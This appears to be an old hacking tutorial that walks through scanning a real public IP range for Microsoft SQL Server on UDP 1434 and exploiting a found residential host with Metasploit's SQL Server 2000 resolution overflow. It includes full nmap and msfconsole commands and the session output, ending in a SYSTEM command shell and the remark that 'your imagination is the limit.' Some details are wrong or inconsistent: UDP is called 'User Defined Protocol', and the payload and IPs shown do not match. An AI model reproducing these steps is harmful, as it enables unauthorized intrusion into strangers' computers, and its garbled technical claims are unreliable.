Metasploit MSSQL Exploit

The following exploit is for Microsoft SQL Server.

Requirements
Metasploit framework
NMap

Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port. While 1434 is a UDP (User Defined Protocol) port. For NMap we will be using a SYN Scan a SYN scan is pretty much like playing ding dong ditch. A regular protocol requires a three way hand shake. A SYN scan initiates the hand shake waits for a reply then leaves. Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow. “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).”

First step is to find a vulnerable host to do this we will be looking for a host that has port 1434 open. When I scan hosts with NMap I always give it a range for I have a better chance of getting a hit. I also have the command output the results to a file for I have them on record and they are easier to search.

#nmap –sU –p1434 –P0 –sS 24.151.0.0/16 >>/home/user/1434.txt

-sU UDP scan
-p What port to scan in this case 1434
-P0 Don’t ping host first
-sS SYN scan this is for TCP but I’m in the habit of always using it
IP The IP address 24.151.0.0
/ Subnet suffix in this case 16=255.255.0.0
>> Where the output file is going to be located

The scan is going to take a while we are scanning 65,025 hosts. When the scan is done or 30min feel free to start searching the output file for anything that says open.

Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s

So now that we found a potential box for attack we try to hack it. I will be using Metasploit 2 console for this attack, Metasploit 3, gui and web interface will all work as well.

#msfconsole
[*] Starting the Metasploit Framework...



+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf >use mssql2000_resolution
msf mssql2000_resolution >set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 1434 The target port

Payload: Name Default Description
-------- -------- ------------------------------------------- ----------------------
--------------------
required EXITFUNC process Exit technique: "proce
ss", "thread", "seh"
required METDLL /home/framework/data/meterpreter/metsrv.dll The full path the mete
rpreter server dll
required LPORT 4444 Listening port for bin
d shell

Target: MSQL 2000 / MSDE

msf mssql2000_resolution(win32_bind_meterpreter) >


msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76




msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter> use –m Process
loadlib: Loading library from ‘ext227496.dll’ on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute –f cmd –c
execute: Executing ‘cmd’…
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1…
meterpreter>
interact: Starter interactive channel 1.

Microsfor Windows 2000 {Version 5.00.2195
© Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

When you get to the shell you can do a whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, that means you have Administrator rights. Now your imagination is the limit.